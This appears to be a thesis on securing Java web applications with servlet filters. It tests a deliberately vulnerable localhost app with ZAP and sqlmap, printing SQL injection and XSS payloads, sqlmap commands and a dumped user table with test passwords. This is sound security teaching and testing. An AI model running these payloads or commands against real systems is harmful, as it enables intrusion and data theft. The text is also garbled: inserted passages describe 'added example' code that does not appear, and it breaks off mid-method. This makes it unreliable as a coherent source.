When developing a web application, its security must not be forgotten: authentication mechanisms, encryption, access control, protection of users' confidential data and so on. All of this can be implemented from scratch, but it should be remembered that many security tools already exist and are successfully applied in the form of various frameworks and libraries. Among the advantages of such solutions are the availability of documentation and of usage instructions for various scenarios. Nevertheless, using such tools cannot guarantee the absence of vulnerabilities in the application, so the best approach is to detect them with various scanners and penetration tests, and then close the gaps found using the functionality of the ready-made solutions. 

Examples of ready-made solutions for Java web applications are considered below. 
Spring Security 

Spring Security is a Java/JavaEE framework that provides mechanisms for building authentication/authorization systems and other security functions for applications implemented with the Spring Framework. 

The security context is created as an XML file describing the resources, access rights and privileges. 

Apache Shiro 

Apache Shiro is an open-source Java framework that provides mechanisms for authentication, authorization, cryptography and session management. 

For authentication, Shiro has tokens - keys for signing in to the system, for example UsernamePasswordToken, which carries the user name and password and implements the AuthenticationToken interface, which describes how permissions and access rights are obtained. 

Java Authentication and Authorization Service 

JAAS is an extensible library implementing the PAM information-security standard. The main purpose of JAAS is to separate authentication and authorization from the application's core functionality. 

For the system administrator, JAAS consists of two configuration files: 

*.login.conf defines the login modules and how they are to be used in the application; 

*.policy defines user privileges. 

For the developer, JAAS is a standard library that provides: 

• a representation of a subject and its set of permissions; 

• a login service; 

• a service for checking that a subject holds the permissions required to use a piece of functionality. 

jGuard 

jGuard is an open-source library implementing authentication and authorization for web applications. jGuard is built on JAAS, a stable component of the Java J2SE API. jGuard is a flexible tool and offers various ways of configuring the authentication and authorization mechanisms. 
1.3.2. Solutions adopted at the operation stage 

To secure an application that is already in operation, external protection tools are used, for example intrusion detection systems, firewalls, and application-layer traffic filters specialized for web applications (WAF - Web Application Firewall). The latter are preferable, since they are developed specifically to protect web applications and, unlike other tools, are not overloaded with unrelated functions, which makes them easier to administer. 

A WAF can be implemented as a cloud service (for small and medium business), as a dedicated hardware appliance, or as a virtual appliance (large business). A WAF is usually deployed in reverse-proxy mode, but other modes are possible, for example a passive mode in which it works on a replicated copy of the traffic. 

Once the WAF is installed and traffic is flowing, its main protection mechanism is activated: machine learning, which builds a reference model of the interaction with the protected object and thereby populates a whitelist of permitted access identifiers. At present web applications use the following kinds of identifiers: HTTP parameters, resource IDs and session IDs (cookies). The WAF determines the permitted values of these for the application. 

Besides machine learning, a WAF also offers the following security mechanisms: 

• protocol validation and signature analysis; 

• protection against injections and XSS (often proprietary); 

• creation of custom protection rules; 

• protection against DDoS attacks; 

• integration with reputation services. 

General requirements for a modern WAF: 

• response to the threats in the OWASP Top 10; 

• inspection according to the security policy, with event logging; 

• prevention of data leaks; 

• inspection of page content, including HTML, CSS, and the delivery protocols (HTTP/HTTPS); 

• protection against threats aimed at the WAF itself; 

• prevention/detection of session ID forgery; 

• automatic updating of attack signatures; 

• support for SSL certificates; 

• support for hardware key storage (FIPS). 





2. Developed software 

2.1. Description of the developed software 

2.1.1. Architecture 

Web applications are built on the client-server architecture. A servlet container can serve as the server. A servlet is a Java interface whose implementation extends the server's functionality and interacts with clients on the request-response principle. Java was chosen because it is a sufficiently popular platform for implementing cross-platform web applications. 

In a web application the client sends a request to the server, where a servlet handles it. Both the request and the response to the client can be pre-processed by a servlet filter: reusable Java code that can modify the data of HTTP requests and responses and the information in their headers. 

To secure web applications, it was decided to develop servlet filters that process client requests and server responses. 

IntelliJ IDEA was chosen as the development environment. It is an integrated development environment for software in many programming languages, in particular Java, JavaScript and Python, developed by JetBrains. 

2.1.2. Servlets and servlet filters 

Servlets can serve any kind of request, but their typical use is extending web servers. For this purpose Java defines special HTTP servlet classes, for example HttpServlet. The main methods overridden in a servlet are doGet (the actions performed on receiving a GET request) and doPost (the actions performed on receiving a POST request). 

Consider the servlet life cycle: 

1) The servlet is not yet present in the container: 

A) The servlet class is loaded into the container. 

B) An instance of the servlet class is created. 

C) The init() method is called to initialize the servlet; it is called first and only once. 

2) The servlet serves a client request. Requests are processed in separate threads by the service() method, which determines the request type and dispatches it to the corresponding handler method. 

3) The servlet is removed with the destroy() method when necessary. 

As with a servlet, the server calls the filter's init(FilterConfig config) method, which initializes and configures the filter. The doFilter method processes requests and responses. When the filter is taken out of service, the destroy() method is called. 

The doFilter method receives as an input parameter the list of filters still to run, FilterChain chain. After processing the request/response, the filter calls chain.doFilter to pass control to the next filter. 

Filters run in the order in which they are declared. A filter is declared inside a <filter> element and attached inside <filter-mapping> in the web.xml file. 


2.1.3. Developed filters 

RequestEscapingFilter - a filter that escapes request data. 

Escaping is the replacement of special control characters in text with their corresponding equivalents. An attacker can exploit the fact that the application does not validate its input properly by injecting, for example, a malicious script into an HTML page rendered in the browser, or an additional condition or an entire query into a parameter used in an SQL statement. The best protection against SQL injection is prepared statements, in which the number and type of parameters are stated explicitly. In some cases, however, their use is impossible or too costly in performance terms. For this reason escaping is also a means of protection against SQL injection. 
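The recommendation above, as an added JDBC example (not code from the thesis or its test application): the same user lookup written first as the dynamic query the text warns about and then as the prepared statement it recommends. The table name users, the column login and the class UserLookup are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

/** Two ways of asking "does this login exist?" against an assumed users(login) table. */
public class UserLookup {

    /**
     * Vulnerable form (kept only to show the defect): the parameter is spliced
     * into the statement text. A login value containing a single quote can
     * terminate the literal and append its own condition, so the value becomes SQL.
     */
    static boolean existsUnsafe(Connection conn, String login) throws SQLException {
        String sql = "SELECT 1 FROM users WHERE login = '" + login + "'";
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            return rs.next();
        }
    }

    /**
     * Safe form: the statement text is fixed and has exactly one parameter of
     * type string. The driver transmits the value separately from the SQL, so
     * quotes or keywords in it are just characters of the compared value.
     */
    static boolean existsSafe(Connection conn, String login) throws SQLException {
        String sql = "SELECT 1 FROM users WHERE login = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, login);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }
}
```

With existsSafe, a login such as O'Brien is simply compared literally; with existsUnsafe the same value already breaks the statement, which is the symptom the error-based technique in section 1.2.4 looks for.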

The following characters must be escaped: 

Character   Replacement 
"           &#34; 
$           &#36; 
%           &#37; 
&           &#38; 
'           &#39; 
*           &#42; 
;           &#59; 
<           &#60; 
>           &#62; 
{           &#123; 
|           &#124; 
}           &#125; 

This conversion is performed by the methods of the developed Escaper class. It contains the methods String escape(String s), StringBuffer escape(StringBuffer s), String escapeQuery(String s) and String escapeHeader(String s). In every case the method creates a new StringBuilder (a StringBuffer in the case of StringBuffer escape(StringBuffer s)), appends the non-control characters of the input to it, and replaces the control characters with their safe equivalents. 

To escape request data, the class RequestWrapper was implemented, inheriting from HttpServletRequestWrapper. This class wraps the incoming request, which makes it possible to override the getter methods for parameter values, headers and so on and return escaped data. The following methods are overridden: 

String getRequestURI() - the part of the URL from the protocol name up to the query string; 

String getQueryString() - the query string; 

String getParameter(String parameter) - a request parameter; 

Cookie[] getCookies() - the cookie values; 

String getHeader(String name) - the value of a header. 
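The escaping filter described above, as an added example written from the description (it is not the thesis' own Escaper or RequestWrapper source). It escapes exactly the characters in the table, wraps the request so that the accessor methods return escaped data, and shows the doFilter/chain.doFilter hand-off from section 2.1.2. The remaining accessors listed above (getRequestURI, and the escapeQuery/escapeHeader variants) would follow the same pattern.

```java
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;

/** Escapes the twelve characters from the table into numeric HTML entities. */
public class Escaper {
    // The characters the text treats as control characters; all others pass through
    private static final String CONTROL = "\"$%&'*;<>{|}";

    public static String escape(String s) {
        if (s == null) {
            return null;
        }
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (CONTROL.indexOf(c) >= 0) {
                out.append("&#").append((int) c).append(';');   // e.g. '<' becomes &#60;
            } else {
                out.append(c);
            }
        }
        return out.toString();
    }
}

/** Wraps the request so that downstream code only ever sees escaped values. */
class RequestWrapper extends HttpServletRequestWrapper {
    RequestWrapper(HttpServletRequest request) {
        super(request);
    }

    @Override
    public String getParameter(String name) {
        return Escaper.escape(super.getParameter(name));
    }

    @Override
    public String getHeader(String name) {
        return Escaper.escape(super.getHeader(name));
    }

    @Override
    public String getQueryString() {
        return Escaper.escape(super.getQueryString());
    }

    @Override
    public Cookie[] getCookies() {
        Cookie[] cookies = super.getCookies();
        if (cookies != null) {
            for (Cookie c : cookies) {
                c.setValue(Escaper.escape(c.getValue()));
            }
        }
        return cookies;
    }
}

/** Substitutes the wrapper and passes control to the next filter in the chain. */
class RequestEscapingFilter implements Filter {
    @Override
    public void init(FilterConfig config) throws ServletException { }

    @Override
    public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
            throws IOException, ServletException {
        if (req instanceof HttpServletRequest) {
            req = new RequestWrapper((HttpServletRequest) req);
        }
        chain.doFilter(req, resp);   // servlets further down receive the wrapped request
    }

    @Override
    public void destroy() { }
}
```

Escaper.escape("<b>x</b>") yields "&#60;b&#62;x&#60;/b&#62;", which a browser renders as literal text rather than markup; a value without any of the listed characters is returned unchanged.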

ResponseAddHeadersFilter - a filter that adds headers to server responses. 

Server response headers are also used to secure a web application. Additional HTTP headers can make it considerably harder for an attacker to carry out attacks such as code injection, "man in the middle" and others. Some of these headers are not supported by every browser, but that is no reason to forgo this additional protection altogether. 

The X-XSS-Protection header can prevent some cross-site scripting attacks. It is supported by Chrome, Opera, Internet Explorer 8+, Android and Safari, is used by Google, GitHub and Facebook, and can take the following values: 

0 - the built-in protection is disabled; 

1 - protection is enabled; the page is sanitized when an attack is detected; 

1; mode=block - protection is enabled; the page is not rendered when an attack is detected; 

1; report=http://example.com/report - protection is enabled; a report is sent when an attack is detected. 

The filter uses the following setting: 
resp.addHeader("X-XSS-Protection", "1; mode=block") 

The X-Frame-Options header can prevent clickjacking attacks: it instructs the browser not to load your page inside a frame/iframe. A clickjacking attack works as follows: the attacker loads their own page in an invisible layer on top of a visible, outwardly harmless page; a control on the malicious page is aligned with the visible link or button; the attack is used to sign the victim up for services or to steal confidential data. The header is not supported by all browsers. It can take the following values: 

SAMEORIGIN - loading the content in a frame/iframe is allowed only when the frame and the embedding page are on the same domain; 

DENY - loading the content in frames is forbidden; 

ALLOW-FROM - loading the content in a frame/iframe is allowed only for a specified URL. 

The filter uses the following setting: 

resp.addHeader("X-Frame-Options", "DENY") 

The X-Content-Type-Options header is used to prevent attacks that rely on MIME (Multipurpose Internet Mail Extensions) type spoofing. The header carries settings for determining the file type, so that interception of the packets is not permitted. 

The filter uses the following setting: 

resp.addHeader("X-Content-Type-Options", "nosniff") 

The Content-Security-Policy header describes the permitted resources, for example images and media, and sets the rules for using inline scripts, fonts and styles. Loading from sources not on the whitelist is blocked. The header must contain one or more directives for resources. The default-src directive gives the default permitted sources for all directives. In the list, URLs are separated by spaces; 'self' refers to the current domain, and 'none' is used when nothing should be loaded under the given directive. 

The filter uses the following setting: 

resp.addHeader("Content-Security-Policy", "default-src 'self'") 


ReferrerFilter - a filter that checks the referer header. 

For the simplest protection against cross-site request forgery, the referer request header can be used (the misspelling of the word referrer became so widespread that it made its way into the official HTTP specifications). Referer carries the URL of the request's origin and is normally used to gather statistics on how users reached the site: from a search query, from a link on another site, or from a particular advertiser. 

The filter checks whether the request's referer header matches the patterns given in the filter's validPatterns parameter. If the request came from an unknown source, the user is redirected to the page given in the redirectTo parameter. All values of the filter's initialization parameters must be separated by commas, for example for validPatterns (starting with the protocol name): 
http://example/test/,http://exam/pass/ 

This filter should be used only as a supplement to a robust authentication system that uses an anti-CSRF token. 
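The referer check described above, as an added example written from the description (not the thesis' own ReferrerFilter source). The init parameter names validPatterns and redirectTo are taken from the text; the patterns are treated as URL prefixes, which is an assumption, and a missing header is treated as an unknown origin.

```java
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Redirects any request whose Referer does not start with one of the
 * configured prefixes. Configured in web.xml with, for example:
 *   validPatterns = http://example/test/,http://exam/pass/
 *   redirectTo    = /login
 */
public class ReferrerFilter implements Filter {
    private final List<String> validPrefixes = new ArrayList<String>();
    private String redirectTo;

    @Override
    public void init(FilterConfig config) throws ServletException {
        String patterns = config.getInitParameter("validPatterns");
        if (patterns == null || config.getInitParameter("redirectTo") == null) {
            throw new ServletException("validPatterns and redirectTo are required");
        }
        for (String p : patterns.split(",")) {
            validPrefixes.add(p.trim());
        }
        redirectTo = config.getInitParameter("redirectTo");
    }

    /** True only when the referer is present and begins with a configured prefix. */
    static boolean isValid(String referer, List<String> prefixes) {
        if (referer == null) {
            return false;
        }
        for (String prefix : prefixes) {
            if (referer.startsWith(prefix)) {
                return true;
            }
        }
        return false;
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) resp;
        if (!isValid(request.getHeader("Referer"), validPrefixes)) {
            response.sendRedirect(redirectTo);   // unknown origin: do not run the handler
            return;
        }
        chain.doFilter(req, resp);
    }

    @Override
    public void destroy() { }
}
```

The prefixes must end with a slash, as in the text's example: a prefix http://example without the trailing slash would also accept http://example.attacker.test/ as a valid referer. Browsers and privacy extensions may strip the Referer header entirely, so legitimate users without it are redirected too; that is the reason the text treats this filter only as a supplement to anti-CSRF tokens.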

LoggedInFilter - a filter that checks for an authenticated user in the session. 

Web applications must provide robust authentication and authorization mechanisms. At the same time, checking that the user actually has rights to the requested resource must not be forgotten. Consider signing in to an account: a POST request carrying the login and password is sent, the server processes it, finds the user in the database, checks that the passwords match, and then redirects the client to the successful-sign-in page or the user's profile. But such authorization is useless if the user is not recorded in a session attribute and, on every request for a page that only a signed-in user may see, the presence of that session attribute is not checked. If this is omitted, the profile pages can be reached by bypassing the login page and simply typing in their URL. 

This is the problem LoggedInFilter solves. It checks the session and its attribute whose name is given in the filter's initialization parameters. In addition, the allowed and forbidden addresses for unauthenticated and authenticated users are specified, as well as the pages to which the user should be redirected. The address values in the initialization parameters must be separated by commas, for example: /login,/locale 
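The session check described above, as an added example written from the description (not the thesis' own LoggedInFilter source). The init parameter names userAttribute, publicPaths, loginPage and homePage are assumptions; the comma-separated value format is the one the text specifies.

```java
import java.io.IOException;
import java.util.HashSet;
import java.util.Set;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/**
 * Init parameters (assumed names):
 *   userAttribute - session attribute stored at login, e.g. "user"
 *   publicPaths   - paths open without login, e.g. /login,/locale
 *   loginPage     - where anonymous users are sent, e.g. /login
 *   homePage      - where already signed-in users are sent from the login page, e.g. /profile
 */
public class LoggedInFilter implements Filter {
    private String userAttribute;
    private String loginPage;
    private String homePage;
    private final Set<String> publicPaths = new HashSet<String>();

    @Override
    public void init(FilterConfig config) throws ServletException {
        userAttribute = config.getInitParameter("userAttribute");
        loginPage = config.getInitParameter("loginPage");
        homePage = config.getInitParameter("homePage");
        for (String p : config.getInitParameter("publicPaths").split(",")) {
            publicPaths.add(p.trim());
        }
    }

    /** Signed in means: a session already exists and carries the marker attribute. */
    static boolean isAuthenticated(HttpSession session, String attribute) {
        return session != null && session.getAttribute(attribute) != null;
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) resp;
        String ctx = request.getContextPath();
        // Path relative to the application, e.g. "/profile"
        String path = request.getRequestURI().substring(ctx.length());

        // getSession(false) does not create a session for an anonymous visitor
        boolean loggedIn = isAuthenticated(request.getSession(false), userAttribute);

        if (loggedIn && path.equals(loginPage)) {
            response.sendRedirect(ctx + homePage);   // login page is forbidden once signed in
            return;
        }
        if (loggedIn || publicPaths.contains(path)) {
            chain.doFilter(req, resp);
            return;
        }
        response.sendRedirect(ctx + loginPage);      // protected page without a session marker
    }

    @Override
    public void destroy() { }
}
```

The login servlet is expected to call request.getSession(true).setAttribute(userAttribute, user) only after the password check succeeds; with this filter mapped to /*, typing /profile into the address bar without having done so yields a redirect to /login instead of the page.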

LogOutFilter - a sign-out filter. 

Besides signing in to an account correctly, signing out of it must also be arranged. Otherwise the session data may persist. If the computer is a public one and the user signed out and left, after a while anyone could enter that account bypassing the login page, act on behalf of the signed-in user, and obtain the login/password and other confidential data. 

To remove the session attributes, the session.invalidate() method must be called. But even after that there is no complete certainty that the data is gone: some browsers cache pages, and with them the session parameters. To avoid this, the following response header values should be set: 
resp.setHeader("Cache-Control", "no-cache, no-store") 
resp.setHeader("Pragma", "no-cache") 
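The sign-out handling described above, as an added example written from the description (not the thesis' own LogOutFilter source). The init parameter names logoutPath and redirectTo are assumptions; the two cache headers are the ones quoted in the text, and the Expires header and the cookie expiry are additions.

```java
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/**
 * Handles the sign-out path itself: invalidates the session, expires the
 * session cookie, forbids caching and redirects to the login page.
 * Init parameters (assumed names): logoutPath (e.g. /logout), redirectTo (e.g. /login).
 */
public class LogOutFilter implements Filter {
    private String logoutPath;
    private String redirectTo;

    @Override
    public void init(FilterConfig config) throws ServletException {
        logoutPath = config.getInitParameter("logoutPath");
        redirectTo = config.getInitParameter("redirectTo");
    }

    /** The two headers recommended in the text, plus Expires for older caches. */
    static void setNoCacheHeaders(HttpServletResponse resp) {
        resp.setHeader("Cache-Control", "no-cache, no-store");
        resp.setHeader("Pragma", "no-cache");
        resp.setDateHeader("Expires", 0);
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) resp;
        String ctx = request.getContextPath();
        String path = request.getRequestURI().substring(ctx.length());

        if (!logoutPath.equals(path)) {
            chain.doFilter(req, resp);   // not a sign-out request: pass it on unchanged
            return;
        }

        HttpSession session = request.getSession(false);
        if (session != null) {
            session.invalidate();        // drops every server-side session attribute
        }
        // Ask the browser to discard the session cookie as well
        Cookie expired = new Cookie("JSESSIONID", "");
        expired.setMaxAge(0);
        expired.setPath(ctx.isEmpty() ? "/" : ctx);
        response.addCookie(expired);

        setNoCacheHeaders(response);
        response.sendRedirect(ctx + redirectTo);
    }

    @Override
    public void destroy() { }
}
```

The cache headers matter on the protected pages as much as on the sign-out response: if the profile page was served without them, the browser's back button can still show the cached copy after sign-out, which is the scenario the text describes. Applying setNoCacheHeaders from the filter that guards protected pages closes that gap.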
2.2. Testing 

2.2.1. Architecture of the test application 

The test web application is built on the client-server architecture, with a web browser as the client and the Tomcat servlet container as the server. 

Server: 

Apache Tomcat 7.0.73 - an open-source servlet container developed by the Apache Software Foundation. It implements the servlet specification and the JavaServer Pages (JSP) and JavaServer Faces (JSF) specifications. Tomcat runs web applications and contains a number of programs for self-configuration. Tomcat is used as a standalone web server, as a content server in combination with the Apache HTTP Server, and as the servlet container inside the JBoss and GlassFish application servers. 

PostgreSQL 9.5 - a free object-relational DBMS. In the project it serves as the store for user data. A JDBC (Java DataBase Connectivity) driver connects the application to the database. 

JavaServer Pages (JSP) - a technology for creating pages with dynamic content. The static data can be written in one of the text formats HTML, SVG, WML or XML, while JSP elements construct the dynamic content. The architectural approach used is JSP Model 2, which combines servlets and JSP pages: the servlet processes the request and creates the JavaBeans objects used by the JSP page rendered in the user's browser. The typical sequence of actions in this architecture is: 

1) the request is sent to a servlet; 

2) the servlet processes the request, creates a JavaBean and requests the dynamic content; 

3) the JavaBean obtains access to the information; 

4) the dispatching servlet invokes the servlet compiled from the JSP page; 

5) the compiled servlet embeds the dynamic content in the static context of the HTML page and sends the response to the client. 

Development environment used: IntelliJ IDEA 
Google Guice - a Java framework that supports dependency injection through annotations for configuring objects. It makes it possible to separate an object's contract from the management of its dependencies, and to bind concrete implementations to interfaces. 

Servlets and servlet filters are configured as follows: in a subclass of ServletModule, the configureServlets method is overridden. The methods filter("urlPattern").through(MyFilter.class) and serve("urlPattern").with(MyServlet.class) configure the servlet filters and the servlets respectively. Usually this is done instead in the web.xml deployment descriptor, for example to attach a filter: 

<filter> 
  <filter-name>MyFilter</filter-name> 
  <filter-class>MyFilterClass</filter-class> 
</filter> 

<filter-mapping> 
  <filter-name>MyFilter</filter-name> 
  <url-pattern>/*</url-pattern> 
</filter-mapping> 
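The Guice equivalent of the web.xml fragment above, as an added example (not the thesis' own configuration): a ServletModule that wires the filters described in section 2.1.3 and one servlet. ServletModule, GuiceServletContextListener, filter().through() and serve().with() are Guice's own API; the class names AppServletConfig, SecurityModule and ProfileServlet, and the init parameter values, are assumptions. Guice requires the bound filters and servlets to be singletons, hence the explicit bind(...).in(Singleton.class) lines.

```java
import java.util.HashMap;
import java.util.Map;
import com.google.inject.Guice;
import com.google.inject.Injector;
import com.google.inject.Singleton;
import com.google.inject.servlet.GuiceServletContextListener;
import com.google.inject.servlet.ServletModule;

/** Declared in web.xml as a <listener>, alongside GuiceFilter mapped to /*. */
public class AppServletConfig extends GuiceServletContextListener {

    /** Programmatic replacement for the <filter> and <filter-mapping> elements. */
    static class SecurityModule extends ServletModule {
        @Override
        protected void configureServlets() {
            // Guice-managed filters and servlets must be singletons
            bind(RequestEscapingFilter.class).in(Singleton.class);
            bind(ResponseAddHeadersFilter.class).in(Singleton.class);
            bind(LoggedInFilter.class).in(Singleton.class);
            bind(ProfileServlet.class).in(Singleton.class);

            // Init parameters for LoggedInFilter (assumed names and values)
            Map<String, String> loginParams = new HashMap<String, String>();
            loginParams.put("userAttribute", "user");
            loginParams.put("publicPaths", "/login,/locale");
            loginParams.put("loginPage", "/login");
            loginParams.put("homePage", "/profile");

            // Filters run in the order they are declared here
            filter("/*").through(RequestEscapingFilter.class);
            filter("/*").through(ResponseAddHeadersFilter.class);
            filter("/*").through(LoggedInFilter.class, loginParams);

            serve("/profile").with(ProfileServlet.class);
        }
    }

    @Override
    protected Injector getInjector() {
        return Guice.createInjector(new SecurityModule());
    }
}
```

The order of the filter(...) calls is the order in which requests pass through the filters, so the escaping wrapper is installed before the session check reads any parameter.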
Figure 2.2.1.1 Architecture of the web application 
2.2.2. Description of the test application 

The test web application is a deliberately minimal implementation of a social network with the following features: 

• account registration; 

• signing in to and out of the account; 

• changing account data; 

• searching for other users of the network; 

• sending friend requests; 

• accepting/rejecting a request; 

• creating chats with other users. 

The application was intentionally built with several vulnerabilities: for example, it uses dynamic queries without bound variables, incoming data is neither escaped nor filtered, passwords are not encrypted, and the sign-in and sign-out algorithms are implemented incorrectly. 






2.2.3. Testing the web application

For testing the web application, the Zed Attack Proxy vulnerability scanner and the sqlmap injection detection tool were chosen.

Passive scanning with ZAP identified the following vulnerabilities (Fig. 2.2.4.1):



Alerts (13):
• Application Error Disclosure
• HTTP Only Site
• X-Frame-Options Header Not Set
• Content Security Policy (CSP) Header Not Set (5)
• Password Autocomplete in Browser (2)
• Server Leaks Version Information via "Server" HTTP Response Header Field
• Web Browser XSS Protection Not Enabled (5)
• X-Content-Type-Options Header Missing
• Absence of Anti-CSRF Tokens (3)
• Non-Storable Content (6)
• Storable and Cacheable Content (4)
• User Agent Fuzzer (7)
• Cookie vulnerability scanner

Figure 2.2.3-1 Results of the passive scan

Medium risk level:

Application Error Disclosure - the page contains an error message; this can reveal confidential information such as the location of the file that raised an unhandled exception (the page shows an error message when an incorrect login/password is entered).

HTTP Only Site - the HTTPS protocol is not used.

X-Frame-Options Header Not Set - the X-Frame-Options header, which protects against clickjacking attacks, is not included in the HTTP response.

Low risk level:

Content Security Policy (CSP) Header Not Set - the CSP header, which defines the resources permitted on the page, is not included in the response.

Password Autocomplete in Browser - password autocompletion in the browser is allowed.

Server Leaks Version Information via "Server" HTTP Response Header Field - the response contains information about the server version.

Web Browser XSS Protection Not Enabled - the browser's built-in XSS protection is not enabled.

X-Content-Type-Options Header Missing - the protective X-Content-Type-Options header is not included in the response.

Absence of anti-CSRF tokens.

Active scanning with ZAP identified the following vulnerabilities (Fig. 2.2.4.2):

Alerts (18):
• Advanced SQL Injection - PostgreSQL > 8.1 AND time-based blind
• Advanced SQL Injection - PostgreSQL > 8.1 stacked queries (comment)
• Advanced SQL Injection - PostgreSQL AND error-based - WHERE or HAVING clause
• Cross Site Scripting (Reflected) (2)
• SQL Injection - PostgreSQL
• Application Error Disclosure
• HTTP Only Site (2)
• X-Frame-Options Header Not Set
• Content Security Policy (CSP) Header Not Set (5)
• Password Autocomplete in Browser (2)
• Server Leaks Version Information via "Server" HTTP Response Header Field (10)
• Web Browser XSS Protection Not Enabled (5)
• X-Content-Type-Options Header Missing
• Absence of Anti-CSRF Tokens (3)
• Non-Storable Content (6)
• Storable and Cacheable Content (4)
• User Agent Fuzzer (252)
• Cookie vulnerability scanner (2)

Figure 2.2.3-2 Results of the active scan

High risk level:

SQL Injection - PostgreSQL - the DBMS in use was identified (injection of the ' character into the login field).

Advanced SQL Injection - SQL attacks of several kinds are possible:

1) time-based blind (injection of the expression ZAP' AND 3305=(SELECT 3305 FROM PG_SLEEP(5)) AND 'sKpe'='sKpe into the login field);

2) stacked queries (injection of the expression ZAP';SELECT PG_SLEEP(5)-- into the login field);

3) error-based (injection of the expression ZAP' AND 6519=CAST((CHR(58)||CHR(102)||CHR(113)||CHR(109)||CHR(58))||(SELECT (CASE WHEN (6519=6519) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(103)||CHR(97)||CHR(101)||CHR(58)) AS NUMERIC) AND 'kltr'='kltr into the login field).

Cross Site Scripting - XSS attacks are possible (injection of the expression "><script>alert(1);</script> into an input field).

An example of an XSS attack carried out manually:

[Figure: screenshot of the profile editing page at localhost:8080/test/profileChange; the "About me" field contains the entered script '><script>alert("XSS-ATTACK!!!!")</script>]

Figure 2.2.3-3 Example of an XSS attack - entering the script


[Figure: screenshot of the profile page at localhost:8080/test/profile; the browser shows the dialog "Confirm the action on localhost:8080: XSS-ATTACK!!!!" and the "About me" field displays only the fragment ">]

Figure 2.2.3-4 Example of an XSS attack - result
Let us test the application with sqlmap. Run the command:

python sqlmap.py -u http://localhost:8080/test/login --data="login=sqlmap&password=sqlmap" --dbs

-u - target URL
--data - POST request parameters
--dbs - enumerate the available databases



On the /login page, the POST parameter login is vulnerable to SQL attacks (boolean-based blind, error-based, stacked queries, time-based blind). The web application technology was identified as JSP. The target DBMS was also identified as PostgreSQL.

Databases found:


available databases [4]:
[*] information_schema
[*] itnet
[*] pg_catalog
[*] testdb

Figure 2.2.3.6 Databases found
Run the following command to obtain the list of tables in the testdb database:

python sqlmap.py -u http://localhost:8080/test/login --data="login=sqlmap&password=sqlmap" -D testdb --tables

We obtain the list:

Figure 2.2.3.7 List of tables in the testdb database

Run the following command to obtain a dump of the user table:

python sqlmap.py -u http://localhost:8080/test/login --data="login=sqlmap&password=sqlmap" -D testdb -T user --dump

Result:


Database: testdb
Table: user
[5 entries]
+-------+---------+----------+-----------+------------+
| id    | info    | password | last_name | first_name |
+-------+---------+----------+-----------+------------+
| sql   | <blank> | inject   | HACKER    | TRUE       |
| troll | a       | fat      | a         | talk       |
| user1 | <blank> | 1234     | Ivanov    | Ivan       |
| user2 | info    | 12345    | Petrov    | Petr       |
| user3 | <blank> | 123456   | Semenov   | Semen      |
+-------+---------+----------+-----------+------------+

Figure 2.2.3.8 Dump of the user table


Thus, by exploiting just one parameter, login, on the authorization page, it was possible to obtain the data of all registered users in the testdb database.

2.2.4. Testing the web application with the developed filters

Enabling the filters

Example of enabling the referer header checking filter in the servlet configuration module:

Map<String, String> referrerFilterParams = new HashMap<>();
referrerFilterParams.put("validPatterns", "http://localhost:8080/testsec/");

filter("/*").through(ReferrerFilter.class, referrerFilterParams);
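As an added example (not the thesis author's code), the following shows how a ServletModule subclass could register the referer-checking filter described above, and what such a filter might look like inside. ReferrerFilter and the validPatterns parameter name come from the page; the comma-separated parameter format, the SecurityModule class name and the decision to check only non-GET requests are assumptions.

```java
import com.google.inject.Singleton;
import com.google.inject.servlet.ServletModule;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.util.*;

// Guice module: the same registration as in the page's snippet, with the init
// parameter handed to the filter instead of being declared in web.xml.
public class SecurityModule extends ServletModule {
    @Override
    protected void configureServlets() {
        Map<String, String> referrerFilterParams = new HashMap<>();
        // Assumed format: comma-separated list of allowed Referer prefixes.
        referrerFilterParams.put("validPatterns", "http://localhost:8080/testsec/");
        filter("/*").through(ReferrerFilter.class, referrerFilterParams);
    }
}

// Filters managed by Guice Servlet must be singletons.
@Singleton
class ReferrerFilter implements Filter {
    private final List<String> validPatterns = new ArrayList<>();

    @Override
    public void init(FilterConfig config) throws ServletException {
        String raw = config.getInitParameter("validPatterns");
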